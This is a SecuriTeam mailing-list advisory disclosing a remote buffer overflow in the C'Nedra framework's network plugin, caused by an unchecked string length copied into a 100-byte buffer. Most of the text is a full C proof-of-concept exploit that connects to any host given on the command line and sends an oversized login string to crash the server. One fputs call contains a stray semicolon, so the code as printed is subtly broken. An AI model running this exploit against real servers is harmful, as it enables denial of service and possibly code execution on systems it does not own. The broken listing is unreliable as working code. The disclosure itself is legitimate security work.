The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
C'Nedra Buffer Overflow
------------------------------------------------------------------------
SUMMARY
<http://www.cnedra.org/> C'Nedra is "an open source virtual reality
framework for the creation of various worlds and applications".
A buffer overflow with C'Nedra allow attackers to remotely execute
arbitrary code.
DETAILS
Vulnerable Systems:
* C'Nedra version 0.4.0 and prior
The network plugin is affected by a buffer-overflow in the function
READ_TCP_STRING() located in game_message_functions.cpp and used to read
the text strings received from the network. First it reads the 32 bit
number that specifies the size of the text string and then copies it into
a local buffer of only 100 bytes allowing an attacker to execute malicious
code.
Exploit:
/*
by Luigi Auriemma - http://aluigi.altervista.org/poc/cnedrabof.zip
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef WIN32
#include <winsock.h>
#include "winerr.h"
#define close closesocket
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
#endif
#define VER "0.1"
#define PORT 3002
#define BUFFSZ 8192
#define MSG_LOGIN 120
#define BOF "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
u_int resolv(char *host);
void std_err(void);
int main(int argc, char *argv[]) {
struct sockaddr_in peer;
int sd,
len;
u_short port = PORT;
u_char buff[BUFFSZ];
struct {
u_short msg_type;
u_short msg_size;
int msg_client;
u_int msg_frame;
u_short msg_param;
} mh;
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
setbuf(stdout, NULL);
fputs("\n"
"C'Nedra <= 0.4.0 buffer-overflow "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@altervista.org\n"
"web: http://aluigi.altervista.org\n";
"\n", stdout);
if(argc < 2) {
printf("\n"
"Usage: %s <host> [port(%d)]\n"
"\n", argv[0], port);
exit(1);
}
if(argc > 2) port = atoi(argv[2]);
peer.sin_addr.s_addr = resolv(argv[1]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
printf("- target %s : %hu\n",
inet_ntoa(peer.sin_addr), port);
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
*(u_int *)buff = htonl(sizeof(BOF) - 1);
memcpy(buff + 4, BOF, sizeof(BOF) - 1);
len = 4 + (sizeof(BOF) - 1);
mh.msg_type = htons(MSG_LOGIN);
mh.msg_size = htons(len);
mh.msg_client = htonl(0);
mh.msg_frame = htonl(0);
mh.msg_param = htons(0);
send(sd, (void *)&mh, sizeof(mh), 0); // username
send(sd, buff, len, 0);
close(sd);
fputs("- check the server manually to see if it is crashed\n",
stdout);
return(0);
}
u_int resolv(char *host) {
struct hostent *hp;
u_int host_ip;
host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError: Unable to resolve hostname (%s)\n", host);
exit(1);
} else host_ip = *(u_int *)(hp->h_addr);
}
return(host_ip);
}
#ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
}
#endif
/* EOF */
ADDITIONAL INFORMATION
The information has been provided by <mailto:aluigi@autistici.org> Luigi
Auriemma.
You can obtain a copy of winerr.h at:
<http://www.securiteam.com/unixfocus/5UP0I1FC0Y.html>
http://www.securiteam.com/unixfocus/5UP0I1FC0Y.html
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
